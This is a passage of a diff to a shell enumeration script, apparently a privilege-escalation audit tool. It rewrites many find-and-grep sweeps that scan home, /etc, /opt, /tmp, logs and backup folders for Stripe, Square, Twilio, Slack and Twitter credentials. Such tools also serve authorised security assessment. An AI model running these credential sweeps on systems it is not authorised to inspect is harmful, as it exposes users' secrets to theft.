"xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Stripe API Key (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & +print_3title_no_nl "Searching Stripe API Key (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Square Access Token (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & +print_3title_no_nl "Searching Square Access Token (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Square Oauth Secret (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & +print_3title_no_nl "Searching Square Oauth Secret (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Twilio API Key (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & +print_3title_no_nl "Searching Twilio API Key (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Twitter Client ID (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & +print_3title_no_nl "Searching Twitter Client ID (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed 